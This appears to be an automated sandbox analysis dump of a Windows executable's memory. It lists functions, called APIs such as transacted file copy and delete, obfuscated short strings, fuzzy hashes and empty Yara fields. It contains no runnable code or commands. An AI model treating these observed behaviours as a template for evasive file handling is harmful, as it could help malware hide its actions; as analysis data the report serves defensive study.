0x001e7bf9
0x001e7bf9
0x001e7c05
0x001e7c0d
0x001e7c12
0x00000000
0x001e7c12
0x001e7b80
0x001e7b87
0x001e7b98
0x001e7b3a
0x001e7b3a
0x001e7b3d
0x001e7b40
0x00000000
0x001e7b40
0x001e7b7e
0x001e7b2c
0x001e7b33
0x001e7b38
0x00000000
0x001e7aea
0x001e7aea
0x001e7aed
0x001e7af1
0x001e7c2e
0x001e7c33
0x001e7c3c
0x001e7c3c

APIs

__EH_prolog.LIBCMT ref: 001E7AA2

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E7AB2, 001E7AC2, 001E7B67, 001E7BA8, 001E7BEA
not keep_stack.empty(), xrefs: 001E7AC3
not key_keep_stack.empty(), xrefs: 001E7BA9
object_element, xrefs: 001E7BEF
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E7B68

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 2cd61af480824d61e274cd80e3aba707b740105470417f12c45546e73e244221
Instruction ID: bb7f43cc9aed699cf4be8c09f08d393b794615670e47c40333e90c7d673ff022
Opcode Fuzzy Hash: 2cd61af480824d61e274cd80e3aba707b740105470417f12c45546e73e244221
Instruction Fuzzy Hash: 26510430A04684DFDB14EF65C496BAEBBB5BF55310F1480A8E845AB2D2D770ED54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D3DA4, Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D3DA9
std::_Lockit::_Lockit.LIBCPMT ref: 001D3DB7
int.LIBCPMT ref: 001D3DCE

Part of subcall function 001C9703: std::_Lockit::_Lockit.LIBCPMT ref: 001C9714
Part of subcall function 001C9703: std::_Lockit::~_Lockit.LIBCPMT ref: 001C972E

std::_Facet_Register.LIBCPMT ref: 001D3E08
std::_Lockit::~_Lockit.LIBCPMT ref: 001D3E1E
Concurrency::cancel_current_task.LIBCPMT ref: 001D3E33
__EH_prolog.LIBCMT ref: 001D3E3E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2276526224-0
Opcode ID: f2f4e494650637a9dfe5a0fa91f96de93bef0c6031829467b3d7bdf91f6ca1a4
Instruction ID: 3d3d68f8c7828784fd20fb88c03dbeb7d7b06114276667d8a1270d92a8f20100
Opcode Fuzzy Hash: f2f4e494650637a9dfe5a0fa91f96de93bef0c6031829467b3d7bdf91f6ca1a4
Instruction Fuzzy Hash: E6418EB5D11229EBCB14DFA8D445AAEBBB8FF54310F20411FE515A7381CBB09A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 002216F5, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00221441: _free.LIBCMT ref: 00221466

_free.LIBCMT ref: 00221743

Part of subcall function 00217FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?), ref: 00217FF9
Part of subcall function 00217FE3: GetLastError.KERNEL32(?,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?,?), ref: 0021800B

_free.LIBCMT ref: 0022174E
_free.LIBCMT ref: 00221759
_free.LIBCMT ref: 002217AD
_free.LIBCMT ref: 002217B8
_free.LIBCMT ref: 002217C3
_free.LIBCMT ref: 002217CE

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7122ea4dd8d581fee9ea5740ef5c0be1ad72b39192b70f4362e4c0f484b468f2
Instruction ID: adf6516e25182d806896a5104fdba42ed71ce2e4cbaded141883a0ad564910e0
Opcode Fuzzy Hash: 7122ea4dd8d581fee9ea5740ef5c0be1ad72b39192b70f4362e4c0f484b468f2
Instruction Fuzzy Hash: 97117F31564B24BAD520BBB0DC4BFCB77EDEF50B00F404815B29D76452DA28B5758E51

Uniqueness

Uniqueness Score: -1.00%

Function 001E3DC0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMT ref: 001E3E1B
std::bad_exception::bad_exception.LIBCMT ref: 001E3E2B
std::bad_exception::bad_exception.LIBCMT ref: 001E3E3B
std::bad_exception::bad_exception.LIBCMT ref: 001E3E5E

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E3DFF
false, xrefs: 001E3E04

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: A:\_Work\rc-build-v1-exe\json.hpp$false
API String ID: 2160870905-3678202009
Opcode ID: 39c6f85852c2886ba125332ed3b1b54e6c928d11088d4511620a5e9fa2ca7671
Instruction ID: 473ec417b2185688991b23f3df3e96a0d71f38c3b644c736fd2536785f909ea6
Opcode Fuzzy Hash: 39c6f85852c2886ba125332ed3b1b54e6c928d11088d4511620a5e9fa2ca7671
Instruction Fuzzy Hash: 55115C31950B9067CB1EEB6ADC0DEFF37656B22B00F208109F071334D2D3659629C240

Uniqueness

Uniqueness Score: -1.00%

Function 001E3E98, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMT ref: 001E3EF3
std::bad_exception::bad_exception.LIBCMT ref: 001E3F03
std::bad_exception::bad_exception.LIBCMT ref: 001E3F13
std::bad_exception::bad_exception.LIBCMT ref: 001E3F36

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E3ED7
false, xrefs: 001E3EDC

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: A:\_Work\rc-build-v1-exe\json.hpp$false
API String ID: 2160870905-3678202009
Opcode ID: dfcdb1e35a9387c4bc0beb6572f51a7b138cd8cb9a24ace97904d6817093c885
Instruction ID: 02829b0ba0e7237cf2c4cb31e3a38ab339579716ddfe11a7241340bb91831b42
Opcode Fuzzy Hash: dfcdb1e35a9387c4bc0beb6572f51a7b138cd8cb9a24ace97904d6817093c885
Instruction Fuzzy Hash: 0A115931E60B946BC71EEBAADC0EEEE77356F12B00F108146F031328D6C7A59A29C611

Uniqueness

Uniqueness Score: -1.00%

Function 00217596, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(8304488B,0020657E,00000000), ref: 002175DE
__fassign.LIBCMT ref: 002177BD
__fassign.LIBCMT ref: 002177DA
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00217822
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00217862
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0021790E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a0a983e7b1975aec1daf53c167982fd4c85d346e431cbea87761603e0dfb80d8
Instruction ID: 98280c7763d6f03989e3fbb602d732b4af0a5554a02747e9e4bb7c64ad584711
Opcode Fuzzy Hash: a0a983e7b1975aec1daf53c167982fd4c85d346e431cbea87761603e0dfb80d8
Instruction Fuzzy Hash: ABD1BA74D142499FCF15CFA8D8809EDBBF5AF98314F28006AE855BB242D730AE96CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001EAB86, Relevance: 9.2, APIs: 6, Instructions: 236fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001EAB8B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 001EAC96
CloseHandle.KERNEL32(00000000), ref: 001EACA5
GetFileSize.KERNEL32(00000000,00000000), ref: 001EACEC
ReadFile.KERNEL32(00000010,00000000,00000000,?,00000000), ref: 001EAD17
CloseHandle.KERNEL32(00000010), ref: 001EAD1E

Part of subcall function 001CB7A7: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,?,?), ref: 001CB7BA
Part of subcall function 001CB7A7: DeleteFileTransactedA.KERNEL32 ref: 001CB7D1
Part of subcall function 001CB7A7: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,?,?,?,?,001DA87D,00000012,?,?), ref: 001CB7DC

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID:
API String ID: 604483397-0
Opcode ID: 2b8f62e4873d4db652e292bf361d46947b33993872ae3cc88c9ea75539504cca
Instruction ID: 3360b6df51cbf7404a192b12351dedfdb48a2f3f6b3c929cf8ed786f479a3c1d
Opcode Fuzzy Hash: 2b8f62e4873d4db652e292bf361d46947b33993872ae3cc88c9ea75539504cca
Instruction Fuzzy Hash: B391B071C002989FDF15EFE8D991AEEFBB5BF26300F50809AE456B7252DB301A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001D819E, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 421COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D81A3

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Strings

:+, xrefs: 001D81CE
+*/", xrefs: 001D82BA
kf, xrefs: 001D8416
$-<;, xrefs: 001D825C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted
String ID: $-<;$+*/"$:+$kf
API String ID: 86610801-2765919554
Opcode ID: 65c224cced7163b4c48680ffe187bf9f947b4a26a5586ccfaac574a93dc0f044
Instruction ID: 195b5dfea4dc1c8ad1b2fc4e707572bbcccced85857b2dcd552655e5586091c9
Opcode Fuzzy Hash: 65c224cced7163b4c48680ffe187bf9f947b4a26a5586ccfaac574a93dc0f044
Instruction Fuzzy Hash: 8F026870C04259DADF15EFA8C891BEDFBB1AF29300F1081AEE42977282DB745A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001DAF7A, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 363COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DAF7F

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Strings

id, xrefs: 001DB1C1
kbst, xrefs: 001DB02A
], xrefs: 001DB091
`se`, xrefs: 001DB088

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted
String ID: ]$`se`$id$kbst
API String ID: 86610801-646620230
Opcode ID: b9995c04426c4ab81598d41d60b2ccfec923983bc97111693606d3e0cc8b954f
Instruction ID: e66717db3a655ddb93ead58ea43d184434e47f94d958a74fe3ffcd19740523d4
Opcode Fuzzy Hash: b9995c04426c4ab81598d41d60b2ccfec923983bc97111693606d3e0cc8b954f
Instruction Fuzzy Hash: EDF15A70D05289DACF15EFA4C491AEDFBB1AF29300F2481AEE42677352DB346A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001DB4C9, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 361COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DB4CE

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Strings

1, xrefs: 001DB5E3
%)", xrefs: 001DB4F6
8, xrefs: 001DB4FD
Y-6+, xrefs: 001DB729

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted
String ID: %)"$1$8$Y-6+
API String ID: 86610801-1479651145
Opcode ID: 81a38997c74b10126c39c3d03b5cdcb8169632981bc9ee714addfca5495cb44f
Instruction ID: 37382246ecfdd248119402f3d144f0f1f05dd7f2ae132af3341f33f67a1849ef
Opcode Fuzzy Hash: 81a38997c74b10126c39c3d03b5cdcb8169632981bc9ee714addfca5495cb44f
Instruction Fuzzy Hash: DCF17670D04258DBCF15EBA8C891AEDFBB1BF69304F1041AEE41A77382DB346A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001FA5E6, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001FA5EB
std::_Lockit::_Lockit.LIBCPMT ref: 001FA5F9
int.LIBCPMT ref: 001FA610

Part of subcall function 001C9703: std::_Lockit::_Lockit.LIBCPMT ref: 001C9714
Part of subcall function 001C9703: std::_Lockit::~_Lockit.LIBCPMT ref: 001C972E

std::_Facet_Register.LIBCPMT ref: 001FA64A
std::_Lockit::~_Lockit.LIBCPMT ref: 001FA660
Concurrency::cancel_current_task.LIBCPMT ref: 001FA675

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 7700fb774a4cdbbb0199672060ce63bbbf526131069cbb3da5c50827f7604fc5
Instruction ID: 26fea02258c4f35236c5ecd9ee5c5fcec38c1d0251888548ef03c392e10ae54c
Opcode Fuzzy Hash: 7700fb774a4cdbbb0199672060ce63bbbf526131069cbb3da5c50827f7604fc5
Instruction Fuzzy Hash: CD21D1B291121DEBCB14DFA4D915BBE77B8EF60334F14052AFA19D7281DBB89900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D35BF, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D35C4
std::_Lockit::_Lockit.LIBCPMT ref: 001D35D2
int.LIBCPMT ref: 001D35E9

Part of subcall function 001C9703: std::_Lockit::_Lockit.LIBCPMT ref: 001C9714
Part of subcall function 001C9703: std::_Lockit::~_Lockit.LIBCPMT ref: 001C972E

std::_Facet_Register.LIBCPMT ref: 001D3623
std::_Lockit::~_Lockit.LIBCPMT ref: 001D3639
Concurrency::cancel_current_task.LIBCPMT ref: 001D364E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 114aeb0cfabd5cff9fa5c0eb29c0943b9323e8d43dc44ae24d99511db83ccda8
Instruction ID: 22f03847c662842df7f225de73411690a93b1073367c3cc2f2ba0a068334054e
Opcode Fuzzy Hash: 114aeb0cfabd5cff9fa5c0eb29c0943b9323e8d43dc44ae24d99511db83ccda8
Instruction Fuzzy Hash: BA11C235D15129ABCB15EFA8D849BBEB764EF64720F14011EE625A7381DB70DE00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D9CBB, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 295COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D9CC0

Part of subcall function 001D541C: _Find_unchecked1.LIBCPMT ref: 001D544E

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Strings

_RR[, xrefs: 001D9CEF
LQbI, xrefs: 001D9CE8
$sEHHAPW, xrefs: 001D9F1C
JM, xrefs: 001D9CF6

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateTransaction$CommitCopyCreateFileFind_unchecked1H_prologTransacted
String ID: $sEHHAPW$JM$LQbI$_RR[
API String ID: 1507343314-1452397149
Opcode ID: dee3fdda4169954615491c5d9fe7f4bd84166ebc66d198fb9a9ced6933fdb63e
Instruction ID: 7b1f8e01e91542e3f65e050878416bd1427eddbc00a99cbc2d0c35d6314bc47c
Opcode Fuzzy Hash: dee3fdda4169954615491c5d9fe7f4bd84166ebc66d198fb9a9ced6933fdb63e
Instruction Fuzzy Hash: 00D1AB70D042988ACF15EFE8C491AEDFBB2AF69300F14819EE45A77382DB345A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D438C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 001D43F0
_wmemset.LIBCMT ref: 001D4480
_Deallocate.LIBCONCRT ref: 001D449A
_wmemset.LIBCMT ref: 001D44B2

Strings

4hU@[Y]W, xrefs: 001D4394, 001D4395, 001D4411

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate_wmemset
String ID: 4hU@[Y]W
API String ID: 4187233464-1563900851
Opcode ID: 7ebc20df19307d43588c9981cf0b8f61f7e046f1911054e42ea23e79f23916b6
Instruction ID: 135933174d6f0fb92c8c4621de55dcfb6f912e4d64db849f4be69ed459c84469
Opcode Fuzzy Hash: 7ebc20df19307d43588c9981cf0b8f61f7e046f1911054e42ea23e79f23916b6
Instruction Fuzzy Hash: E1418E71500219BBCB04DF98D881CAEBBA9FF99350B14012EF819D7351DB71EA60C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00217322, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(4hU@[Y]W,00000000,4hU@[Y]W,0020B999,002191D1,7FFFFFFF,?,002001D2,00000000,?,001D4650,00000000,?,4hU@[Y]W,?,?), ref: 00217327
_free.LIBCMT ref: 00217384
_free.LIBCMT ref: 002173BA
SetLastError.KERNEL32(00000000,00000007,000000FF,?,002001D2,00000000,?,001D4650,00000000,?,4hU@[Y]W,?,?,4hU@[Y]W,4hU@[Y]W), ref: 002173C5

Strings

4hU@[Y]W, xrefs: 00217324, 00217326

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
